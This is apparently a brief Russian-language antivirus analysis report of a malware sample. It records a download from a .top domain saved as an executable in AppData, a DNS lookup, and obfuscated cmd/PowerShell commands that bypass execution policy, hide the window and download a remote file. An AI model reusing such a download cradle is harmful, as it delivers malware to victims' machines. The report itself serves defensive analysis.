Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^WER^SheLL^.^ExE^ ^-eXecUti^oNPoL^Icy^ B^ypASS -noPRoFI^L^e ^-Wi^NDowSTYLE Hi^D^D^EN (N^E^w^-obJ^Ec^T^ s^Y^sTEM^.n^eT^.W^Ebc^l^I^E^n^t).^do^WnloA^df^i^LE(^'http://www.fapoergol.to...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "P^o^WER^SheLL^.^ExE^ ^-eXecUti^oNPoL^Icy^ B^ypASS -noPRoFI^L^e ^-Wi^NDowSTYLE Hi^D^D^EN (N^E^w^-obJ^Ec^T^ s^Y^sTEM^.n^eT^.W^Ebc^l^I^E^n^t).^do^WnloA^df^i^LE(^'http://www.fapoergol.to...' (со скрытым окном)